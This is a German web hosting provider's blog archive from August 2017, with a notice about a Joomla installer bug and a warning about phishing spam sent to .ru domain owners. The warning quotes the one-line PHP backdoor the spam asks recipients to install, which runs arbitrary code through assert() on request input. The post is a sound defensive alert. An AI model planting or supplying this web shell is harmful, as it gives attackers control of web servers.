Archive for August, 2017

Probleme bei der Installation von Joomla

Mittwoch, August 16th, 2017

Aufgrund eines Programmierfehlers im Installer der aktuellen Joomla-Version 3.7.4 lässt sich diese nicht auf unseren Webservern installieren. Die Fortschrittsanzeige bei der Installation bleibt bei etwa 10% stehen, dann passiert nichts mehr.

Der Fehler ist den Joomla-Entwicklern bekannt und wird in der nächsten Joomla-Version behoben. Bitte nutzen Sie für eine Neuinstallation von Joomla bis dahin die Vorgängerversion 3.7.3 und nehmen dann ein Update auf die aktuelle Joomla-Version vor.

Update

Der Fehler wurde in der neuen Joomla Version 3.7.5 behoben.

Gefährlicher Spam an Inhaber von .ru-Domains

Montag, August 7th, 2017

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.